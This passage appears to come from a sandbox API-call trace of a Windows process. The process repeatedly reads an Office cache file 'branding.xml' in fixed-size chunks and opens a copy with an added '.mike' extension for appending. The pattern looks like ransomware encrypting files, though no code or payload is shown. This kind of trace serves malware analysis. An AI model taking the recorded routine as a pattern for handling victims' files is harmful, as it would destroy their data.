| out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.536] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.536] GetFileType (hFile=0x264) returned 0x1 [0041.537] GetFileType (hFile=0x264) returned 0x1 [0041.537] SetFilePointer (in: hFile=0x264, lDistanceToMove=133120, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x20800 [0041.537] ReadFile (in: hFile=0x264, lpBuffer=0x2235918, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2235918*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.538] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.539] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.539] GetFileType (hFile=0x264) returned 0x1 [0041.539] GetFileType (hFile=0x264) returned 0x1 [0041.539] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x20a20 [0041.539] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.539] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.539] GetFileType (hFile=0x264) returned 0x1 [0041.539] GetFileType (hFile=0x264) returned 0x1 [0041.539] SetFilePointer (in: hFile=0x264, lDistanceToMove=143360, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x23000 [0041.539] ReadFile (in: hFile=0x264, lpBuffer=0x2242924, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2242924*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.543] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.543] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.543] GetFileType (hFile=0x264) returned 0x1 [0041.543] GetFileType (hFile=0x264) returned 0x1 [0041.543] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x23220 [0041.544] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.544] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.544] GetFileType (hFile=0x264) returned 0x1 [0041.544] GetFileType (hFile=0x264) returned 0x1 [0041.544] SetFilePointer (in: hFile=0x264, lDistanceToMove=153600, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x25800 [0041.544] ReadFile (in: hFile=0x264, lpBuffer=0x224f930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x224f930*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.545] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.545] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.545] GetFileType (hFile=0x264) returned 0x1 [0041.545] GetFileType (hFile=0x264) returned 0x1 [0041.545] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x25a20 [0041.546] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.546] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.546] GetFileType (hFile=0x264) returned 0x1 [0041.546] GetFileType (hFile=0x264) returned 0x1 [0041.546] SetFilePointer (in: hFile=0x264, lDistanceToMove=163840, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x28000 [0041.546] ReadFile (in: hFile=0x264, lpBuffer=0x225c93c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x225c93c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.547] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.547] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.547] GetFileType (hFile=0x264) returned 0x1 [0041.548] GetFileType (hFile=0x264) returned 0x1 [0041.548] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x28220 [0041.548] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.548] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.548] GetFileType (hFile=0x264) returned 0x1 [0041.548] GetFileType (hFile=0x264) returned 0x1 [0041.548] SetFilePointer (in: hFile=0x264, lDistanceToMove=174080, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2a800 [0041.548] ReadFile (in: hFile=0x264, lpBuffer=0x2269948, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2269948*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.549] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.549] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.550] GetFileType (hFile=0x264) returned 0x1 [0041.550] GetFileType (hFile=0x264) returned 0x1 [0041.550] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2aa20 [0041.550] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.550] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.550] GetFileType (hFile=0x264) returned 0x1 [0041.550] GetFileType (hFile=0x264) returned 0x1 [0041.550] SetFilePointer (in: hFile=0x264, lDistanceToMove=184320, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2d000 [0041.550] ReadFile (in: hFile=0x264, lpBuffer=0x2276954, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2276954*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.552] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.552] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.552] GetFileType (hFile=0x264) returned 0x1 [0041.552] GetFileType (hFile=0x264) returned 0x1 [0041.552] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2d220 [0041.552] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.552] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.552] GetFileType (hFile=0x264) returned 0x1 [0041.552] GetFileType (hFile=0x264) returned 0x1 [0041.552] SetFilePointer (in: hFile=0x264, lDistanceToMove=194560, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2f800 [0041.553] ReadFile (in: hFile=0x264, lpBuffer=0x2283960, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2283960*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.554] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.554] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.554] GetFileType (hFile=0x264) returned 0x1 [0041.554] GetFileType (hFile=0x264) returned 0x1 [0041.554] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2fa20 [0041.554] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.554] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.555] GetFileType (hFile=0x264) returned 0x1 [0041.555] GetFileType (hFile=0x264) returned 0x1 [0041.555] SetFilePointer (in: hFile=0x264, lDistanceToMove=204800, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x32000 [0041.555] ReadFile (in: hFile=0x264, lpBuffer=0x229096c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x229096c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.556] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.556] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.556] GetFileType (hFile=0x264) returned 0x1 [0041.556] GetFileType (hFile=0x264) returned 0x1 [0041.556] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x32220 [0041.557] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.557] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.557] GetFileType (hFile=0x264) returned 0x1 [0041.557] GetFileType (hFile=0x264) returned 0x1 [0041.557] SetFilePointer (in: hFile=0x264, lDistanceToMove=215040, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x34800 [0041.557] ReadFile (in: hFile=0x264, lpBuffer=0x229d978, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x229d978*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.565] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.565] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.565] GetFileType (hFile=0x264) returned 0x1 [0041.565] GetFileType (hFile=0x264) returned 0x1 [0041.565] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x34a20 [0041.565] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.565] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.566] GetFileType (hFile=0x264) returned 0x1 [0041.566] GetFileType (hFile=0x264) returned 0x1 [0041.566] SetFilePointer (in: hFile=0x264, lDistanceToMove=225280, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x37000 [0041.566] ReadFile (in: hFile=0x264, lpBuffer=0x22aa984, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22aa984*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.567] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.567] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.567] GetFileType (hFile=0x264) returned 0x1 [0041.567] GetFileType (hFile=0x264) returned 0x1 [0041.567] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x37220 [0041.567] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.568] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.568] GetFileType (hFile=0x264) returned 0x1 [0041.568] GetFileType (hFile=0x264) returned 0x1 [0041.568] ReadFile (in: hFile=0x264, lpBuffer=0x22b7990, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22b7990*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.569] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.569] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.569] GetFileType (hFile=0x264) returned 0x1 [0041.569] GetFileType (hFile=0x264) returned 0x1 [0041.569] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x39a20 [0041.569] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.570] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 